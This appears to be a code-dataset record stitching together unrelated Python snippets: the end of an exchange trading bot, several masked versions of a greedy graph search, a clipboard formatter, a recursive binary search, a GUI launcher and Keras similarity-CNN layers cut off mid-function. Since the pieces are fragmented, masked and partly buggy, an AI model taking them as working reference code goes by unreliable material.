0\nxlf_buy = 0\n\ndef main():\n global exchange\n exchange = connect()\n hello()\n hello_from_exchange = read_from_exchange(exchange)\n # A common mistake people make is to call write_to_exchange() > 1\n # time for every read_from_exchange() response.\n # Since many write messages generate marketdata, this will cause an\n # exponential explosion in pending messages. Please, don't do that!\n print(\"The exchange replied:\", hello_from_exchange, file=sys.stderr)\n global positions\n positions[\"BOND\"] = hello_from_exchange[\"symbols\"][0][\"position\"]\n positions[\"VALE\"] = hello_from_exchange[\"symbols\"][5][\"position\"]\n positions[\"VALBZ\"] = hello_from_exchange[\"symbols\"][4][\"position\"]\n positions[\"XLF\"] = hello_from_exchange[\"symbols\"][7][\"position\"]\n\n add(\"BOND\", \"BUY\", 999, 100 - positions[\"BOND\"])\n add(\"BOND\", \"SELL\", 1001, 100 + positions[\"BOND\"])\n\n while (True):\n server_msg = read_from_exchange(exchange)\n buy_sell_vale()\n buy_sell_xlf()\n listen_for_fills(server_msg)\n listen_for_book(server_msg)\n listen_for_errors(server_msg)\n \ndef hello():\n write_to_exchange(exchange, {\"type\": \"hello\", \"team\": team_name.upper()})\n\ndef add(symbol, direction, price, size):\n # Update order id to be order placed number\n global orders_placed\n orders_placed += 1\n # Add to pending orders list\n global pending_orders\n pending_orders.append(orders_placed)\n #if symbol == \"VALE\":\n print(\"Order Placed: \" + str(orders_placed) + \" Position: \" + str(positions[symbol])+ \" Size: \" + str(size) + \" Dir: \" + direction + \" Symbol: \" + symbol + \" Price: \" + str(price) + \"\")\n\n # Increment Buy Orders If Necessary\n if (direction == \"BUY\"):\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif (direction == \"SELL\"):\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n # Add order to exchange\n write_to_exchange(exchange, {\"type\": \"add\", \"order_id\": orders_placed, \"symbol\": symbol,\n \"dir\":direction, \"price\":price, \"size\": size })\n # \n read_from_exchange(exchange)\n\ndef cancel(order_id):\n write_to_exchange(exchange, {\"type\": \"cancel\", \"order_id\": order_id}) \n\ndef listen_for_fills(server_msg):\n if (server_msg[\"type\"] == \"fill\"):\n # Get info of filled order\n order_num = server_msg[\"order_id\"]\n symbol = server_msg[\"symbol\"]\n size = server_msg[\"size\"]\n direction = server_msg[\"dir\"]\n global positions\n # Update bond order fill and buy/sell as necessary\n if (symbol == \"BOND\"):\n # print(\"Bond Order Partially Filled: \" + str(order_num))\n if (direction == \"BUY\"):\n pending_buy_orders[symbol] -= size\n add(\"BOND\", \"SELL\", 1001, size)\n elif (direction == \"SELL\"):\n pending_sell_orders[symbol] -= size\n add(\"BOND\", \"BUY\", 999, size)\n # Update Vale Order fill and hedge as necessary\n if (symbol == \"VALE\"):\n print(\"Vale Order Filled: \" + str(order_num) + \" \" + direction + \" Size: \" + str(size))\n if (direction == \"BUY\"):\n pending_buy_orders[symbol] -= size\n positions[\"VALE\"] += size\n elif (direction == \"SELL\"):\n positions[\"VALE\"] -= size\n pending_sell_orders[symbol] -= size\n if (symbol == \"XLF\"):\n print(\"XLF Order Filled: \" + str(order_num) + \" \" + direction + \" Size: \" + str(size))\n if (direction == \"BUY\"):\n pending_buy_orders[symbol] -= size\n positions[\"XLF\"] += size\n elif (direction == \"SELL\"):\n positions[\"XLF\"] -= size\n pending_sell_orders[symbol] -= size\n\ndef listen_for_book(server_msg):\n if (server_msg[\"type\"] == \"book\"):\n global vale_sell\n global vale_buy\n global xlf_sell\n global xlf_buy\n if (server_msg[\"symbol\"] == \"VALE\"):\n if len(server_msg[\"sell\"]) > 0:\n vale_sell = server_msg[\"sell\"][0][0]\n if len(server_msg[\"buy\"]) > 0:\n vale_buy = server_msg[\"buy\"][0][0]\n if (server_msg[\"symbol\"] == \"XLF\"):\n if len(server_msg[\"sell\"]) > 0:\n xlf_sell = server_msg[\"sell\"][0][0]\n if len(server_msg[\"buy\"]) > 0:\n xlf_buy = server_msg[\"buy\"][0][0]\n\ndef buy_sell_vale():\n if vale_buy > 0 and vale_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if ( pending_buy_orders[\"VALE\"] + positions[\"VALE\"] < 10):\n global vale_buy_pending_id\n if vale_buy_pending_id:\n cancel(vale_buy_pending_id)\n pending_buy_orders[\"VALE\"] = 0\n vale_buy_pending_id = None\n print(\"Cancel VALE BUY Order: \" + str(orders_placed))\n time.sleep(1)\n num_stock = 10 - positions[\"VALE\"]\n add(\"VALE\", \"BUY\", vale_buy + 1, 10 - positions[\"VALE\"])\n\n vale_buy_pending_id = orders_placed\n elif (positions[\"VALE\"] - pending_sell_orders[\"VALE\"] > -10):\n global vale_sell_pending_id\n if vale_sell_pending_id:\n print(\"Cancel VALE Sell Order: \" + str(orders_placed))\n cancel(vale_sell_pending_id)\n pending_sell_orders[\"VALE\"] = 0\n vale_sell_pending_id = None\n time.sleep(1)\n num_stock = 10 - positions[\"VALE\"]\n add(\"VALE\", \"SELL\", vale_sell - 1, num_stock)\n vale_sell_pending_id = orders_placed\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if ( pending_buy_orders[\"XLF\"] + positions[\"XLF\"] < 100):\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders[\"XLF\"] = 0\n xlf_buy_pending_id = None\n print(\"Cancel XLF Order: \" + str(orders_placed))\n time.sleep(1)\n add(\"XLF\", \"BUY\", xlf_buy + 1, 100 - positions[\"XLF\"])\n xlf_buy_pending_id = orders_placed\n elif (positions[\"XLF\"] - pending_sell_orders[\"XLF\"] > -100):\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print(\"Cancel XLF Order: \" + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders[\"XLF\"] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add(\"XLF\", \"SELL\", xlf_sell - 1, 100 + positions[\"XLF\"])\n xlf_sell_pending_id = orders_placed\n\ndef listen_for_errors(server_msg):\n if (server_msg[\"type\"] == \"reject\"):\n print(\"ERROR: ORDER FAILED, id: \" + str(server_msg[\"order_id\"]) + \" \" + server_msg[\"error\"])\n if (server_msg[\"type\"] == \"error\"):\n print(\"ERROR: ORDER FAILED, id: \" + str(id) + \" \" + server_msg[\"error\"])\n if (server_msg[\"type\"] == \"ack\"):\n print(\"Order Completed: \" + str(server_msg[\"order_id\"]))\n if (server_msg[\"type\"] == \"out\"):\n print(\"Order Successfully Canceled: \" + str(server_msg[\"order_id\"]))\n\n #add(\"BOND\", \"BUY\", 999, 100 - positions[\"BOND\"])\n #add(\"BOND\", \"SELL\", 1001, 100 + positions[\"BOND\"])\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
5,
8,
9,
10,
16
]
}
|
[
5,
8,
9,
10,
16
] |
<|reserved_special_token_0|>
class OrderVector:
<|reserved_special_token_0|>
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
<|reserved_special_token_1|>
import numpy as np
from StudyCaseUdemy.Graph import Graph
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
<|reserved_special_token_1|>
import numpy as np
from StudyCaseUdemy.Graph import Graph
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos+1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos+1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
# vector = OrderVector(5)
# vector.insert(grafo.arad)
# vector.insert(grafo.craiova)
# vector.insert(grafo.bucharest)
# vector.insert(grafo.dobreta)
# vector.insert(grafo.lugoj)
# vector.printer()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
|
flexible
|
{
"blob_id": "87291d066b94aca1d94cbe5d9281fc72da1b0c35",
"index": 9483,
"step-1": "<mask token>\n\n\nclass OrderVector:\n <mask token>\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-4": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-5": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\nclass OrderVector:\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos+1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos+1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)\n\n\nclass Greedy:\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n\ngrafo = Graph()\n# vector = OrderVector(5)\n# vector.insert(grafo.arad)\n# vector.insert(grafo.craiova)\n# vector.insert(grafo.bucharest)\n# vector.insert(grafo.dobreta)\n# vector.insert(grafo.lugoj)\n\n\n# vector.printer()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
__author__ = 'jamjiang'
class Person:
def __init__(self, name):
self.name = name
def sayHi(self):
print 'hi!, I am', self.name
david = Person('David')
david.sayHi()
Person('leo').sayHi()
|
normal
|
{
"blob_id": "fcc12b26308e3031de7e8fcf4ad43ec92279d400",
"index": 5922,
"step-1": "__author__ = 'jamjiang'\nclass Person:\n def __init__(self, name):\n self.name = name\n def sayHi(self):\n print 'hi!, I am', self.name\n\ndavid = Person('David')\ndavid.sayHi()\n\nPerson('leo').sayHi()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# python2.7
#formats for oracle lists
import pyperclip
text = str(pyperclip.paste()).strip()
lines = text.split('\n')
for i in range(len(lines)):
if (i+1) < len(lines):
lines[i] = str('\'')+str(lines[i]).replace("\r","").replace("\n","") + str('\',')
elif (i+1) == len(lines):
lines[i] = str('\'')+str(lines[i]).replace("\r","").replace("\n","")+ '\''
text = '(' + '\n'.join(lines) + ')'
pyperclip.copy(text)
|
normal
|
{
"blob_id": "454fd88af552d7a46cb39167f21d641420973959",
"index": 2312,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(len(lines)):\n if i + 1 < len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + str(\"',\")\n elif i + 1 == len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + \"'\"\n<mask token>\npyperclip.copy(text)\n",
"step-3": "<mask token>\ntext = str(pyperclip.paste()).strip()\nlines = text.split('\\n')\nfor i in range(len(lines)):\n if i + 1 < len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + str(\"',\")\n elif i + 1 == len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + \"'\"\ntext = '(' + '\\n'.join(lines) + ')'\npyperclip.copy(text)\n",
"step-4": "import pyperclip\ntext = str(pyperclip.paste()).strip()\nlines = text.split('\\n')\nfor i in range(len(lines)):\n if i + 1 < len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + str(\"',\")\n elif i + 1 == len(lines):\n lines[i] = str(\"'\") + str(lines[i]).replace('\\r', '').replace('\\n', ''\n ) + \"'\"\ntext = '(' + '\\n'.join(lines) + ')'\npyperclip.copy(text)\n",
"step-5": "# python2.7\r\n#formats for oracle lists\r\n\r\nimport pyperclip\r\ntext = str(pyperclip.paste()).strip()\r\n\r\nlines = text.split('\\n')\r\nfor i in range(len(lines)):\r\n if (i+1) < len(lines):\r\n lines[i] = str('\\'')+str(lines[i]).replace(\"\\r\",\"\").replace(\"\\n\",\"\") + str('\\',')\r\n elif (i+1) == len(lines):\r\n lines[i] = str('\\'')+str(lines[i]).replace(\"\\r\",\"\").replace(\"\\n\",\"\")+ '\\''\r\ntext = '(' + '\\n'.join(lines) + ')'\r\n\r\npyperclip.copy(text)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''code for recursuve binary search '''
def rbinarysearch(l, k, begin, end):
if(begin == end):
if(l[begin] == k):
return 1
else:
return 0
if(end-begin == 1):
if(l[end] == k) or (l[begin] == k):
return 1
else:
return 0
if(end-begin > 1):
mid = (end+begin)//2
if(l[mid] > k):
end = mid-1
if(l[mid] < k):
begin = mid+1
if(l[mid] == k):
return 1
if(end-begin < 0):
return 0
return rbinarysearch(l, k, begin, end)
print(rbinarysearch([1,2,3,4,5], -1, 0,4))
|
normal
|
{
"blob_id": "7171edc3eecd2f0cdebd914e89a7a7e0353ddf63",
"index": 9209,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef rbinarysearch(l, k, begin, end):\n if begin == end:\n if l[begin] == k:\n return 1\n else:\n return 0\n if end - begin == 1:\n if l[end] == k or l[begin] == k:\n return 1\n else:\n return 0\n if end - begin > 1:\n mid = (end + begin) // 2\n if l[mid] > k:\n end = mid - 1\n if l[mid] < k:\n begin = mid + 1\n if l[mid] == k:\n return 1\n if end - begin < 0:\n return 0\n return rbinarysearch(l, k, begin, end)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef rbinarysearch(l, k, begin, end):\n if begin == end:\n if l[begin] == k:\n return 1\n else:\n return 0\n if end - begin == 1:\n if l[end] == k or l[begin] == k:\n return 1\n else:\n return 0\n if end - begin > 1:\n mid = (end + begin) // 2\n if l[mid] > k:\n end = mid - 1\n if l[mid] < k:\n begin = mid + 1\n if l[mid] == k:\n return 1\n if end - begin < 0:\n return 0\n return rbinarysearch(l, k, begin, end)\n\n\nprint(rbinarysearch([1, 2, 3, 4, 5], -1, 0, 4))\n",
"step-4": "'''code for recursuve binary search '''\n\n\ndef rbinarysearch(l, k, begin, end):\n\n if(begin == end):\n if(l[begin] == k):\n return 1\n else:\n return 0\n if(end-begin == 1):\n if(l[end] == k) or (l[begin] == k):\n return 1\n else:\n return 0\n\n if(end-begin > 1):\n mid = (end+begin)//2\n if(l[mid] > k):\n end = mid-1\n if(l[mid] < k):\n begin = mid+1\n if(l[mid] == k):\n return 1\n if(end-begin < 0):\n return 0\n\n return rbinarysearch(l, k, begin, end)\n\n\nprint(rbinarysearch([1,2,3,4,5], -1, 0,4))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python
from PyMca5.PyMcaGui import PyMcaQt as qt
from RixsTool import mainWindow
app = qt.QApplication([])
win = mainWindow.RIXSMainWindow()
win.show()
app.exec_()
|
normal
|
{
"blob_id": "34c8541e640596f51a5232cba06172df5814db14",
"index": 7734,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwin.show()\napp.exec_()\n",
"step-3": "<mask token>\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n",
"step-4": "from PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n",
"step-5": "#!/usr/bin/python\n\nfrom PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
<|reserved_special_token_0|>
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
<|reserved_special_token_0|>
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
<|reserved_special_token_0|>
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
if input_shape[i] != None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
